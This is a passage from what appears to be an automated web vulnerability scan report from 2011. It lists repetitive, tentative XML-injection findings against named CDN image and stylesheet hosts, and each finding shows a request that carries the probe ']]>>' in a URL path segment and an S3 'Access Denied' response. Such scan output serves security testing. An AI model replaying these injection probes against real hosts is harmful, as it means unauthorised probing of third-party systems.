Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>819A30940EB51C98</RequestId><HostId>SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5dey
...[SNIP]...

8.224. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9CB3E9864B675FF5
x-amz-id-2: m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHtXqQYi4B63yrzFi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Content-Length: 231
Age: 148
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 670a67f2c46ac9c411a2c99f9106bcbc55a6c3cb38fc78e8cb72f8eaa5570b8c2139807191cc4c27
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9CB3E9864B675FF5</RequestId><HostId>m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHt
...[SNIP]...

8.225. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets]]>>/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 03933044C122185D
x-amz-id-2: cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9/OU4aBC1elNPDy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
Age: 148
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 553ca38a194551ac4e0a7bf5b78bab0da13f8ddf764ad570dae672f9eeb607bc76272c6e026ad174
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>03933044C122185D</RequestId><HostId>cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9
...[SNIP]...

8.226. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css]]>>/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6F9EC97154F9BC8E
x-amz-id-2: 4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5PZGbjFEw9N9ay+r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
Age: 146
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 006c0b646cccd010d477e710bd00c5e18ef0f5bf60bf056439359e660df964a2e18ffe64b4f25510
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6F9EC97154F9BC8E</RequestId><HostId>4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5P
...[SNIP]...

8.227. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BD7EBEB28E2DF68E
x-amz-id-2: KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV8H6pc3LZh3vE9w
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
Age: 147
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c83e0ffcc4c770eaec40eeb5d25d7d4d19d0b66b4cbddf887153462193eb4e55946b7d1a8054fa86
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BD7EBEB28E2DF68E</RequestId><HostId>KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV
...[SNIP]...

8.228. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AC1028F694BFD3A7
x-amz-id-2: cgiy31T2j/iZwB5l4Dvb7wt0341h8+kzyc8nRqSRZc4TIQBwSk9mpxLDkbCDHa9u
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b75f4776c26d53116240d6fdc9284f9efe700527d810b7d436c4ae33a0cba7ecd860159420834b9
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AC1028F694BFD3A7</RequestId><HostId>cgiy31T2j/iZwB5l4Dvb7wt0341h8+kzyc8nRqSRZc4TIQBwSk
...[SNIP]...

8.229. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1418896566B2B222
x-amz-id-2: bkK5qXPlRlq9UiV6qyiPEgl9UODYV+/AHQY3gtP7g1hlf+igtPFLIZvN/Xw+HAe7
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 38912ede63b29e2810bbff2b12bc46bf0317761c7c2e22fddac6bdb8754d44efe35d4a09fa7bc1ab
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1418896566B2B222</RequestId><HostId>bkK5qXPlRlq9UiV6qyiPEgl9UODYV+/AHQY3gtP7g1hlf+igtP
...[SNIP]...

8.230. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6DD22A2EEB35073C
x-amz-id-2: HX+CILmNe/AlnP9fc5zL6Wj8TSTcD3Wv5oXdchf+9V1ap8CenrKL/VXHrqKeimcR
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:01 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 58e3834b4f04ab3dec08f8a078db788df2715fcaf8a18b20a42aba07cfba5682548f68f038d9f895
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6DD22A2EEB35073C</RequestId><HostId>HX+CILmNe/AlnP9fc5zL6Wj8TSTcD3Wv5oXdchf+9V1ap8Cenr
...[SNIP]...

8.231. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 821358FA1269FAEB
x-amz-id-2: K3h3ZkfMwrMReysxv0bcLfAsC58mxDchNsHjvFpBtFGGWH+59G3PqYIv71ARzuUq
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:05 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 75f7857d0214aa23ccfec61f621ce3771c8d9bd162b08456d860942a8ad7cd09c27e80c8d445eca0
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>821358FA1269FAEB</RequestId><HostId>K3h3ZkfMwrMReysxv0bcLfAsC58mxDchNsHjvFpBtFGGWH+59G
...[SNIP]...

8.232. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 82312AA4D6B24DDD
x-amz-id-2: uhAuEEHIvoWpnrh/y3sINMOTCJ5wXDNv5WfSRmc9g8JQ7ge0QATgAViDssnUcXlv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: be9d42e0320d88aacff21226e65b3bd471927a9512807d275629a289deef550498171346a7a25005
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>82312AA4D6B24DDD</RequestId><HostId>uhAuEEHIvoWpnrh/y3sINMOTCJ5wXDNv5WfSRmc9g8JQ7ge0QA
...[SNIP]...

8.233. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154380y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A1ACA670B4163851
x-amz-id-2: zRr8rV6ejggdJ+Ms8/df7v6x0Ts7VA5aUchjZOlqT++0u3/A0n4JiJVYDxlr7zy1
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:08 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 164de0fc321c56833b4e7b641030d934912fd5090be2b7c95a926eae7e91663c291b83495732ab99
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A1ACA670B4163851</RequestId><HostId>zRr8rV6ejggdJ+Ms8/df7v6x0Ts7VA5aUchjZOlqT++0u3/A0n
...[SNIP]...

8.234. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 7]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png]]>>?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 37EC7380F6932A21
x-amz-id-2: FZs8KdTy0INQhipkYwEmNp+yD7GC5XfVRbCAI1KJsfDPvQz4I8VymJvMvdZAXwZE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:10 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 666669857bd87c54893edeaf1bb268ca5f726d688987433422186c1ba369c5ba4d779761209f6a4c
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>37EC7380F6932A21</RequestId><HostId>FZs8KdTy0INQhipkYwEmNp+yD7GC5XfVRbCAI1KJsfDPvQz4I8
...[SNIP]...

8.235. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 71FC5A8AB89E1392
x-amz-id-2: x67AwLXJBo0Uxh4jd9+pAKVPqX/RV00v1AGywOyJKATxA9NUe94dcdDMyFfR3WdW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f36b90eaf8c19a784b757a616d59e727ac64092312cc538dce91a1cd856bba6d05a88bf4bc85a6e5
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>71FC5A8AB89E1392</RequestId><HostId>x67AwLXJBo0Uxh4jd9+pAKVPqX/RV00v1AGywOyJKATxA9NUe9
...[SNIP]...

8.236. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BA75D20F251D3313
x-amz-id-2: F1Qzp/B3uJDPcVtlTLCpgI0D9xJnBSbLItEtu4uCAoS2Y6mjz9E0XFCy01CYcAo5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
